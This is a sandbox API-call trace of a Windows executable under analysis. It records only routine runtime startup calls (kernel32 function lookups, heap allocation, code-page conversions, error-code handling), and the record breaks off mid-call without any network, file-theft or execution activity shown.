# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 07.11.2019 12:51:05.114 Process: id = "1" image_name = "penelop0611_2019-11-06_10-30.exe_.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe" page_root = "0x517b7000" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x8f4 [0022.107] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x109e1830, dwHighDateTime=0x1d5956a)) [0022.107] GetCurrentThreadId () returned 0x8f4 [0022.107] GetCurrentProcessId () returned 0x8f0 [0022.107] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=14233182946) returned 1 [0022.169] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0022.169] GetProcessHeap () returned 0x6f0000 [0022.170] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0022.170] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0022.171] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0022.172] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0022.172] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0022.172] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0022.172] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3bc) returned 0x701d10 [0022.172] GetCurrentThreadId () returned 0x8f4 [0022.172] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x700818 [0022.172] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x7020d8 [0022.172] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405695, hStdOutput=0x4116af03, hStdError=0x0)) [0022.172] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0022.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0022.172] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0022.172] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" " [0022.173] GetEnvironmentStringsW () returned 0x7028e0* [0022.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0022.173] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x565) returned 0x7033b8 [0022.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x7033b8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0022.173] FreeEnvironmentStringsW (penv=0x7028e0) returned 1 [0022.173] GetLastError () returned 0x7f [0022.173] SetLastError (dwErrCode=0x7f) [0022.173] GetLastError () returned 0x7f [0022.173] SetLastError (dwErrCode=0x7f) [0022.173] GetLastError () returned 0x7f [0022.173] SetLastError (dwErrCode=0x7f) [0022.173] GetACP () returned 0x4e4 [0022.173] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x220) returned 0x703928 [0022.173] GetLastError () returned 0x7f [0022.173] SetLastError (dwErrCode=0x7f) [0022.173] IsValidCodePage (CodePage=0x4e4) returned 1 [0022.173] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0022.173] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0022.173] GetLastError () returned 0x7f [0022.173] SetLastError (dwErrCode=0x7f) [0022.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0022.173] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0022.174] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0022.174] GetLastError () returned 0x7f [0022.174] SetLastError (dwErrCode=0x7f) [0022.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0022.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0022.174] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0022.174] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0022.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83®\x16Aôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0022.174] GetLastError () returned 0x7f [0022.174] SetLastError (dwErrCode=0x7f) [0022.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0022.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0022.174] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0022.174] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0022.174] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83®\x16Aôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0022.174] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4ad2e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x4b [0022.174] GetLastError () returned 0x0 [0022.174] SetLastError (dwErrCode=0x0) [0022.174] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.175] SetLastError (dwErrCode=0x0) [0022.175] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.176] SetLastError (dwErrCode=0x0) [0022.176] GetLastError () returned 0x0 [0022.177] SetLastError (dwErrCode=0x0) [0022.177] GetLastError () returned 0x0 [0022.177] SetLastError 